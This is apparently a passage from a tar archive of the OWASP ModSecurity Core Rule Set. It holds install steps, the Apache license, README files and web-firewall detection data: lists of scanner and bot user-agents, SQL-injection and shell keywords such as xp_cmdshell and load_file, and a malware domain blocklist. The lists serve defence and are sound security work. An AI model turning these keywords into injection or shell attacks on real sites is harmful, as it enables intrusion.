modsecurity_crs_10_setup.conf -> /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf lrwxr-xr-x 1 root wheel 81 May 17 14:01 modsecurity_crs_20_protocol_violations.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_20_protocol_violations.conf lrwxr-xr-x 1 root wheel 80 May 17 14:01 modsecurity_crs_21_protocol_anomalies.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_21_protocol_anomalies.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_23_request_limits.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_23_request_limits.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_30_http_policy.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_30_http_policy.conf lrwxr-xr-x 1 root wheel 72 May 17 14:01 modsecurity_crs_35_bad_robots.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_35_bad_robots.conf lrwxr-xr-x 1 root wheel 77 May 17 14:01 modsecurity_crs_40_generic_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf lrwxr-xr-x 1 root wheel 83 May 17 14:01 modsecurity_crs_41_sql_injection_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_41_xss_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_xss_attacks.conf lrwxr-xr-x 1 root wheel 78 May 17 14:14 modsecurity_crs_42_comment_spam.conf -> /usr/local/apache/conf/crs/optional_rules/modsecurity_crs_42_comment_spam.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_42_tight_security.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_42_tight_security.conf lrwxr-xr-x 1 root wheel 69 May 17 14:01 modsecurity_crs_45_trojans.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_45_trojans.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_47_common_exceptions.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_47_common_exceptions.conf lrwxr-xr-x 1 root wheel 86 May 17 14:01 modsecurity_crs_48_local_exceptions.conf.example -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_48_local_exceptions.conf.example lrwxr-xr-x 1 root wheel 78 May 17 14:01 modsecurity_crs_49_inbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_49_inbound_blocking.conf lrwxr-xr-x 1 root wheel 70 May 17 14:01 modsecurity_crs_50_outbound.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_50_outbound.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_59_outbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_59_outbound_blocking.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_correlation.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_correlation.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_customrules.conf 3) Add the following line to your httpd.conf (assuming you've placed the rule files into conf/crs/): Include conf/crs/modsecurity_crs_10_setup.conf Include conf/crs/activated_rules/*.conf 3) Restart web server. 4) Make sure your web sites are still running fine. 5) Simulate an attack against the web server. Then check the attack was correctly logged in the Apache error log, ModSecurity debug log (if you enabled it) and ModSecurity audit log (if you enabled it). SpiderLabs-owasp-modsecurity-crs-0f07cbb/LICENSE000066400000000000000000000261351216457256400215400ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. SpiderLabs-owasp-modsecurity-crs-0f07cbb/README.md000066400000000000000000000027151216457256400220100ustar00rootroot00000000000000# OWASP ModSecurity Core Rule Set (CRS) ModSecurityâ„¢ is a web application firewall engine that provides very little protection on its own. In order to become useful, ModSecurityâ„¢ must be configured with rules. In order to enable users to take full advantage of ModSecurityâ„¢ out of the box, Trustwave's SpiderLabs is sponsoring and maintaining a free certified rule set for the community. Unlike intrusion detection and prevention systems, which rely on signatures specific to known vulnerabilities, the OWASP ModSecurity Core Rule Set provides generic protection from unknown vulnerabilities often found in web applications, which are in most cases custom coded. The Core Rules are heavily commented to allow it to be used as a step-by-step deployment guide for ModSecurityâ„¢. ## Licensing (c) 2006-2012 Trustwave The ModSecurity Core Rule Set is provided to you under the terms and conditions of Apache Software License Version 2 (ASLv2) http://www.apache.org/licenses/LICENSE-2.0.txt ## Mail-List For more information refer to the OWASP Core Rule Set Project page at http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project Core Rules Mail-list - Suscribe here: https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set Archive: https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/ ## Downloading You can manually download the latest CRS from the GitHub Repo: https://github.com/SpiderLabs/owasp-modsecurity-crs SpiderLabs-owasp-modsecurity-crs-0f07cbb/activated_rules/000077500000000000000000000000001216457256400237025ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/activated_rules/README000066400000000000000000000131301216457256400245600ustar00rootroot00000000000000 Enable the CRS rules files you want to use by creating symlinks under the "activated_rules" directory location. You will want to create symlinks for the following: 1) The main modsecurity_crs_10_setup.conf file 2) Any rules from the base_rules directory 3) Any remaining rules from the optional_rules, slr_rules or experimental_rules directories. $ pwd /usr/local/apache/conf/crs $ ls CHANGELOG app_sensor modsecurity_crs_10_setup.conf slr_rules LICENSE base_rules modsecurity_crs_10_setup.conf.example util README experimental_rules modsecurity_crs_15_customrules.conf activated_rules lua optional_rules $ sudo ln -s /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf activated_rules/modsecurity_crs_10_setup.conf $ for f in `ls base_rules/` ; do sudo ln -s /usr/local/apache/conf/crs/base_rules/$f activated_rules/$f ; done $ for f in `ls optional_rules/ | grep comment_spam` ; do sudo ln -s /usr/local/apache/conf/crs/optional_rules/$f activated_rules/$f ; done $ ls -l activated_rules total 216 lrwxr-xr-x 1 root wheel 52 May 17 14:01 GsbMalware.dat -> /usr/local/apache/conf/crs/base_rules/GsbMalware.dat lrwxr-xr-x 1 root wheel 68 May 17 14:01 modsecurity_35_bad_robots.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_bad_robots.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_35_scanners.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_scanners.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_40_generic_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_40_generic_attacks.data lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_41_sql_injection_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_41_sql_injection_attacks.data lrwxr-xr-x 1 root wheel 74 May 17 14:14 modsecurity_42_comment_spam.data -> /usr/local/apache/conf/crs/optional_rules/modsecurity_42_comment_spam.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_50_outbound.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound.data lrwxr-xr-x 1 root wheel 74 May 17 14:01 modsecurity_50_outbound_malware.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound_malware.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_14_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_14_customrules.conf lrwxr-xr-x 1 root wheel 57 May 17 14:22 modsecurity_crs_10_setup.conf -> /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf lrwxr-xr-x 1 root wheel 81 May 17 14:01 modsecurity_crs_20_protocol_violations.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_20_protocol_violations.conf lrwxr-xr-x 1 root wheel 80 May 17 14:01 modsecurity_crs_21_protocol_anomalies.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_21_protocol_anomalies.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_23_request_limits.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_23_request_limits.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_30_http_policy.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_30_http_policy.conf lrwxr-xr-x 1 root wheel 72 May 17 14:01 modsecurity_crs_35_bad_robots.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_35_bad_robots.conf lrwxr-xr-x 1 root wheel 77 May 17 14:01 modsecurity_crs_40_generic_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf lrwxr-xr-x 1 root wheel 83 May 17 14:01 modsecurity_crs_41_sql_injection_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_41_xss_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_xss_attacks.conf lrwxr-xr-x 1 root wheel 78 May 17 14:14 modsecurity_crs_42_comment_spam.conf -> /usr/local/apache/conf/crs/optional_rules/modsecurity_crs_42_comment_spam.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_42_tight_security.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_42_tight_security.conf lrwxr-xr-x 1 root wheel 69 May 17 14:01 modsecurity_crs_45_trojans.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_45_trojans.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_47_common_exceptions.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_47_common_exceptions.conf lrwxr-xr-x 1 root wheel 86 May 17 14:01 modsecurity_crs_48_local_exceptions.conf.example -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_48_local_exceptions.conf.example lrwxr-xr-x 1 root wheel 78 May 17 14:01 modsecurity_crs_49_inbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_49_inbound_blocking.conf lrwxr-xr-x 1 root wheel 70 May 17 14:01 modsecurity_crs_50_outbound.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_50_outbound.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_59_outbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_59_outbound_blocking.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_correlation.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_correlation.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_customrules.conf SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/000077500000000000000000000000001216457256400226505ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_35_bad_robots.data000066400000000000000000000036571216457256400305720ustar00rootroot00000000000000webmole wisenutbot prowebwalker hanzoweb email toata dragostea mea pentru diavola gameBoy, powered by nintendo missigua poe-component-client emailsiphon adsarobot under the rainbow 2. nessus floodgate email extractor webaltbot contactbot/ butch__2.1.1 pe 1.4 indy library autoemailspider mozilla/3.mozilla/2.01 fantombrowser digout4uagent panscient.com telesoft ; widows converacrawler www.weblogs.com murzillo compatible isc systems irc search 2.1 emailmagnet microsoft url control datacha0s emailwolf production bot sitesnagger webbandit web by mail faxobot grub crawler jakarta eirgrabber webemailextrac extractorpro attache educate search vxb 8484 boston project franklin locator nokia-waptoolkit mailto:craftbot@yahoo.com full web bot pcbrowser psurf user-Agent pleasecrawl/1. kenjin spider gecko/25 no browser webster pro wep Search 00 grub-client fastlwspider this is an exploit contentsmartz teleport pro dts agent nikto morzilla via atomic_email_hunter program shareware 1.0. ecollector emailcollect china local browse 2. backdoor stress test foobar/ emailreaper xmlrpc exploit compatible ; msie s.t.a.l.k.e.r. compatible- webvulnscan nameofagent copyrightcheck advanced email extractor surveybot compatible ;. searchbot admin@google wordpress/4.01 webemailextract larbin@unspecified turing machine zeus windows-update-agent morfeus fucking scanner user-agent: voideye mosiac 1 chinaclaw newt activeX; win32 web downloader safexplorer tl agdm79@mail.ru cheesebot hhjhj@yahoo fiddler psycheclone microsoft internet explorer/5.0 core-project/1 atspider copyguard neuralbot/0.2 wordpress hash grabber amiga-aweb/3.4 packrat rsync crescent internet toolpak security scan vadixbot concealed defense a href= bwh3_user_agent internet ninja microsoft url emailharvest shai wisebot internet exploiter sux wells search ii webroot digimarc webreader botversion black hole w3mir pmafind athens hl_ftien_spider injection takeout eo browse cherrypicker internet-exprorer SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_35_scanners.data000066400000000000000000000006021216457256400302530ustar00rootroot00000000000000grabber cgichk bsqlbf mozilla/4.0 (compatible) sqlmap mozilla/4.0 (compatible; msie 6.0; win32) mozilla/5.0 sf// nessus arachni metis sql power injector bilbo absinthe black widow n-stealth brutus webtrends security analyzer netsparker python-httplib2 jaascois pmafind .nasl nsauditor paros dirbuster pangolin nmap nse sqlninja nikto webinspect blackwidow grendel-scan havij w3af hydra SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_40_generic_attacks.data000066400000000000000000000075301216457256400315700ustar00rootroot00000000000000set-cookie .cookie expiressys.user_objects sys.user_triggers @@spid msysaces instr sys.user_views mysql. sys.tab charindex locate sys.user_catalog constraint_type msysobjects attnotnull select sys.user_tables sys.user_constraints sys.user_tab_columns waitfor sys.all_tables msysrelationships msyscolumns msysqueriessubstr xtype textpos all_objects rownum sysfilegroups sysprocesses user_group sysobjects systables user_tables pg_attribute column_id user_password user_users attrelid user_tab_columns table_name pg_class user_constraints user_objects object_type sysconstraints mb_users column_name atttypid substring object_id syscat sysibm user_ind_columns syscolumns sysdba object_name sqrt insert date instr floor autonomous_transaction print encode coalesce if degrees release_lock procedure_analyse password least cr32 subdate xp_filelist owa_util trim xp_regenumkeys charset ciel bit_or delete time month xp_execresultset round dba_users is master_pos_wait decode unhex char_length strcmp rtrim 'sa' version ord xp_makecab truncate last concat coercibility right length ascii var_samp char extract get_ bit_length xp_regread export_set aes_decrypt name_const left conv bin not_in infile substr uuid is_srvrolemember var_pop ln aes_encrypt outfile current_date quote in user locate @@version exp current_timestamp sql_longvarchar values subtime xp_loginconfig sin xp_regaddmultistring replace tan xmltype character_length cast current_time varchar position to_number addtime mid found_rows stddev xp_availablemedia substring dumpfile isnull cot select concat_ws convert uncompress radians uncompressed_length acos 'sqloledb' dbms_pipe.receive_message utl_http cieling row_count benchmark sec_to_time sysdate hour current_user utc_ curdate nvarchar schema data_type lcase inner make_set day tbcreator sum sign adddate ltrim variance weight_string second microsecond system_user abs ifnull minute unix_timestamp collation curtime lower repeat sp_oacreate group_concat sp_execute xp_ntsec xp_regdeletekey drop quarter local str_to_date nullif from_ old_password xp_regdeletevalue asin oct load_file sp_password bit_xor xp_regremovemultistring chr avg std openquery makedate database updatexml datediff now year mod bit_and lpad xp_enumdsn max period_ soundex shutdown bit_count field connection_id sha default interval xp_dirtree reverse ucase compress xp_terminate_process md5 rpad session_user find_in_set dump convert_tz having des_ greatest xp_regenumvalues utl_file cos log pi sql_variant encrypt upper rand week min xp_cmdshell 'msdasql' space sp_executesql elt pow 'dbo' sp_makewebtask dbms_java to_ format xp_regwrite sp_helpjscript onsubmit copyparentfolder document javascript meta onchange onmove onkeydown onkeyup activexobject onerror onmouseup ecmascript bexpression onmouseover vbscript: Index of >
Index ofMicrosoft VBScript runtime (0x8 error '800 Application uses a value of the wrong type for the current operation Microsoft VBScript compilation (0x8 Microsoft VBScript compilation error Microsoft .NET Framework Version: A trappable error occurred in an external object. The script cannot continue running rror Microsoft VBScript runtime Error >Syntax error in string in query expression ADODB.Command Object required: ' <b>Version Information:</b> does not match with a table name or alias name used in the query You have an error in your SQL syntax near ' Wora_ Wpg_ select list because it is not contained in either an aggregate function or the GROUP BY clause Syntax error converting the supplied argument is not a valid MS SQL supplied argument is not a valid Oracle Unclosed quotation mark before the character string Warning: mysql_connect(): Unable to connect to PostgreSQL server: SQL Server does not exist or access denied supplied argument is not a valid PostgreSQL result Microsoft OLE DB Provider for Access Database Engine Either BOF or EOF is True, or the current record has been deleted supplied argument is not a valid ODBC supplied argument is not a valid MySQL WRoadhouse You have an error in your SQL syntax error '800a01b8' data type as an argument. SQL syntax select list because it is not contained in an aggregate function and there is no GROUP BY clause ' in sysservers. execute sp_addlinkedserver incorrect syntax near These statistics were produced by PeLAB This analysis was produced by These statistics were produced by getstats This report was generated by WebLog ebalizer This summary was generated byfgets ftp_put ftp_nb_put fopen readdir $_post ftp_nb_fput ftp_get scandir readgzfile proc_open ftp_fput fwrite session_start gzopen $_session move_uploaded_file readfile ftp_fget gzencode bzopen gzread call_user_func ftp_nb_fget $_get fscanf fread fgetc ftp_nb_get fgetss gzwrite gzcompressserver.urlencode server.createobject scripting.filesystemobject server.execute wscript.shell <jsp: .createtextfile .addheader wscript.network javax.servlet .loadfromfile server.mappath vbscript.encode server.htmlencode response.write response.binarywrite .getfile ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_50_outbound_malware.data������������0000664�0000000�0000000�00000156612�12164572564�0032020�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������0041099.netsolhost.com/ 00x00.freehostia.com/ 0wnzz.by.ru/ 0xg3458.hub.io/ 109.cypanel.com/ 10thplanet.com/ 115.137.197.60/ 118.216.255.31/ 123.143.98.5/ 123.242.165.138/ 125.163.251.219/ 129.241.91.11/ 129.252.3.27/ 140.116.41.10/ 140.127.22.184/ 140.174.95.72/ 144.206.186.112/ 161.58.102.135/ 163.17.8.18/ 163.26.12.232/ 163.30.34.175/ 189.26.202.84/ 193.126.17.38/ 193.178.146.9/ 193.255.208.32/ 193.92.8.6/ 200.113.126.76/ 200.137.78.13/ 2006.aninite.at/ 2008.itcweb.co.uk/ 201.134.249.164/ 201.16.248.189/ 201.218.228.82/ 202.29.15.17/ 202.91.74.136/ 203.114.112.155/ 203.128.246.107/ 203.210.98.218/ 204.2.183.2/ 206.126.97.21/ 208.57.132.68/ 208.98.22.220/ 208.98.22.241/ 209.222.32.86/ 210.110.97.14/ 210.143.111.146/ 210.240.82.130/ 211.179.234.210/ 211.245.23.155/ 212.227.74.68/ 212.81.134.34/ 212.81.134.35/ 217.20.172.129/ 217.218.225.2/ 220.130.180.180/ 220.134.244.157/ 3sk3nt.kit.net/ 51ucn.com/ 59.120.216.117/ 5euroshirts.com/ 60kmovistar.com/ 62.81.136.90/ 62.94.24.124/ 63.247.71.7/ 63chan.org/ 64.13.230.27/ 64.15.67.17/ 64.32.13.133/ 65.247.182.200/ 66.7.56.125/ 67.15.84.42/ 67.15.84.68/ 67.222.48.109/ 69amigas.com/ 6l0zt.com/ 71.39.154.29/ 72.51.35.246/ 72.9.152.46/ 72.9.157.204/ 74.208.173.138/ 74.208.47.58/ 74.208.97.167/ 74.54.28.74/ 77.74.195.211/ 80.24.176.145/ 80.53.180.196/ 80.93.216.229/ 82.146.51.16/ 82.237.10.37/ 82.239.220.185/ 83.3.132.70/ 85.17.141.101/ 87.117.231.182/ 88.220.140.100/ 88.79.125.58/ 89.171.87.228/ 89.28.13.202/ 90plan.ovh.net/ 94.125.181.5/ aaa22.altervista.org/ aaa2.altervista.org/ aaaa2.altervista.org/ aaaaaaaa2.altervista.org/ aalesundby.no/ aardvarkracing.co.uk/ abaaa.altervista.org/ abaa.altervista.org/ abbath.altervista.org/ abcabc.fileave.com/ abdullah.pp.ru/ abiona.de/ abirdseyeviewof.com/ aboutav.com/ about-dogs.info/ aboutgolfclubs.com/ about-philosophy.ru/ abprogramlari.trakya.edu.tr/ acerbix.altervista.org/ aciel.biz.ly/ actifit.co.kr/ activauto.fr/ .adaiwa.com/ admin.bestcominfo.com/ admins.onceinalifespan.com/ adresik.info/ adweb.com.ua/ aene.de/ aertravel2.com/ aflamsat.com/ aglifestylesmarketplace.com/ ahhmulekrox.xpg.com.br/ aiags.com/ aiplaw.com/ ajudapovos.web6.f3.k8.com.br/ akcommunity.fileave.com/ akisalira.t35.com/ aladin-online.com/ alandar.net/ aldeanos.com/ aldeiadapaz.org.br/ alfabanksemarang.com/ allnet2.fileave.com/ almeriadefensaanimal.org/ .altervista.org/ alwaysdollar.com/ amadeus-umzuege.de/ amboy.do.am/ amboy-x.ucoz.ae/ ambrosiasociety.org/ amcara.com/ amigospv.com/ amixblack.110mb.com/ amyru.h18.ru/ anakdompu.by.ru/ anakdompu.pastebin.com/ anansi.pl/ anaquatico.com/ andii.fileave.com/ anggey.selfip.com/ anirank.com/ annualkellyfamilyreunion.com/ anonimo234.interfree.it/ anthony-campbell.com/ anuncios.pisosinmobiliarios.es/ aokgroup.co.uk/ arclips.com/ arcwebdev.net/ arda.or.th/ arhyoufpt1.ns10-wistee.fr/ armadaglass.webrok.co.uk/ armedassault-turkiye.net/ arnika-tour.ru/ arsenal-music.ru/ artbernard.ru/ arteestetica.org/ artimagebazar.net/ asbak1.fileave.com/ asdasdasd.fileave.com/ asdz.altervista.org/ ashaclub.com/ asia-leap.com/ asoka.nl/ assess.vet.cmu.ac.th/ assishop.com/ asslam-pk.com/ astana-auto.kz/ astel-oscora.com/ atrason.com/ ats-usa.net/ attacker.com/ aukce.hoggos.cz/ aukce.strojnet.com/ autobestwestern.cn/ automotrizozcar.com/ axioma-dch.com/ b0.i8.com/ baaaaaa.altervista.org/ babycaleb.axspace.com/ babycaleb.fortunecity.co.uk/ babycaleb.mvhosted.com/ backconnect.freehost10.com/ backup.nscf-n.or.kr/ badmintonblog.net/ badwolfmx3.wghost.tv/ baliimports.com.au/ ballermarketing.com/ bamrecordsinc.com/ bangalore.ddhanbit.or.kr/ bangkokchurch.com/ bangsat6.fileave.com/ barfod.no/ basic-it.de/ bastel-gianni.ch/ baumann-oliver.de/ bbia.go.id/ beautyengg.com/ bebe.abril.com.br/ bebe.com.br/ beencn.cn/ belasarteshotel.com.br/ benadams.agilityhoster.com/ bergeteufel.de/ bestfindaloan.cn/ besthandycap.com/ bestlotron.cn/ beta.kdd-online.com/ betbigwager.cn/ bghk.net/ biadabz.co.uk/ bibdigital.epn.edu.ec/ bidbpersonel.trakya.edu.tr/ biig.com/ bikelove.hostinginfive.com/ bikerstammtisch.biz/ bildpunktlinden.de/ billiardshow.de/ billing.crazyhostguy.com/ bimbam.dk/ bimonet.zat.su/ biquad.com.br/ bizadmin.hongik.ac.kr/ bjork.name.md/ bl4ckb0t.biz/ blackincoming.freehostia.com/ blacknite.eu/ blankewaffen.de/ blendcolours.com/ blezeer.com/ blissbeads.ca/ blixweb.no/ blog.3s.com.ua/ blogmarianagreefer.com/ blog.sven-downunder.de/ blueravenltd.com/ bmwmotoclubkw.com/ bobyslist.com/ boisetraffic.com/ bookbinding.kr/ book-ua.org/ book.usgne.go.kr/ bosanskinovi.info/ botami01.fileave.com/ botj.altervista.org/ botscanner.michael17.com/ 